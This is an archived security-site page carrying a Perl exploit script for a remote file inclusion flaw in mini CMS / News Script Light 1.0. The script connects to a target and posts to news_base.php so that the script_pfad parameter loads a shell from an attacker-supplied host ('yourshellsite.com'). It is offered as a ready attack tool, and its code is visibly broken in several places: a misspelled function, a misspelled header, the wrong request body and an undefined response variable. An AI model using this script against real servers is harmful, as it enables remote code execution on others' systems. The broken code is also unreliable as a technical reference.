what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

mini CMS / News Script Light 1.0 Remote File Inclusion

mini CMS / News Script Light 1.0 Remote File Inclusion
Posted Aug 27, 2010
Authored by bd0rk

mini CMS / News Script Light version 1.0 remote file inclusion exploit.

tags | exploit, remote, code execution, file inclusion
SHA-256 | eae403bf0182fdec05f65111905678db8e2fb6811bbe3f2dd4e6469330ffc1d1

mini CMS / News Script Light 1.0 Remote File Inclusion

Change Mirror Download
#!/usr/bin/perl
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# mini CMS / News Script Light 1.0 Remote File Include Exploit
#
# Bug found and exploit written by bd0rk || SOH-Crew
#
# Vendor: http://www.hinnendahl.com/
#
# Downloadsite: http://www.hinnendahl.com/index.php?seite=download
#
# Description: The script_pfad parameter in news_base.php isn't declared before require
#
# Contact: bd0rk[at]hackermail.com
# Website: www.soh-crew.it.tt
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use Getopt::Long;

use URI::Escape;

use IO::Socket;

$shellcode = "http://yourshellsite.com";

main();

sub usage
{

print "\mini CMS / News Script Lite 1.0 Remote File Include Exploit\n";
print "Bug found and Exploit written by bd0rk\n";
print "-1, --target\ttarget\t(yourhost.com)\n";
print "-2, --shellpath\tshell\t(http://yourshellsite.com)\n";
print "-3, --dir\tDirectory\t(/news_system)\n";
exit;

}

sub main
{

GetOptions ('1|target=s' => \$target, '2|shellpath=s' => \$shellpath,'3|dir=s' => \$dir);
usage() unless $target;
$shellcode = $shellpath unless !$shellpath;
$targethost = uri_escape($shellcode);

$socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$target",PeerPort=>"80") or die "\nConnection() Failed.\n";

print "\nConnected to ".$target.", Attacking host...\n";
$bd0rk = "inst=true&ins_file=".$target."";
$soh = lenght($bd0rk);

print $socket "POST ".$dir."/news_system/news_base.php?script_pfad= HTTP/1.1\n";
print $socket "Target: ".$target."\n";
print $socket "Connection: close\n";
print $socket "Content-Type: application/x-www-form-urlencoded\n";
print $socket "Content-Lenght: ".$soh."\n\n";
print $socket $soh;
print "Server-Response:\n\n";
{

print " ".$recvd."";
}

exit;

}

Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close